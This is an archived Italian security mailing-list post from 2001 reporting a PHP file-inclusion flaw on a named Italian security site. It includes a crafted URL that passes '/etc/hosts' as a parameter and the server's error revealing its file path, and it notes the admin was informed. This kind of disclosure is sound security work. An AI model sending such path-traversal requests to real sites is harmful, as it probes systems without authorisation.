ancora sulla sicurezza

[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]

Archivio: Aprile 2001 ml@sikurezza.org
Soggetto: ancora sulla sicurezza
Mittente: SosPiro
Data: 5 Apr 2001 15:58:30 -0000

Ciao,
vorrei concludere il discorso sui bug dei siti considerati sicuri perchè
*dovrebbero* insegnare agli admin e non ad aumentare la sicurezza dei propri
server/pc casalinghi.Come fanno ad insegnare se sono i primi ad essere
vulnerabili?
Questa volta tocca a  http://security.webjuice.it ,altro sito italiano.Il
bug sta sempre in uno script php,infatti se si prova a richiedere il
seguente url:

http://security.webjuice.it/guide/Internet/Surfing/index.php?p=/etc/hosts
Questa è la risposta del server:

Warning: Failed opening '/etc/hosts.htm' for inclusion
(include_path='.:/usr/local/lib/php') in
/home/security/www/guide/Internet/Surfing/index.php on line 39

rendendo così visibile la path del webserver,
ovviamente l'admin è già stato avvisato del problema.
SosPiro






________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List

Data:
- precedente: Sendmail 8.9.3/8.8.7, clu$$$terizze
- successivo: R: vpn peer-to-peer, scai
- indice

Argomento:
- precedente: Re: Sendmail 8.9.3/8.8.7, SosPiro
- successivo: R: vpn peer-to-peer, scai
- indice

[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005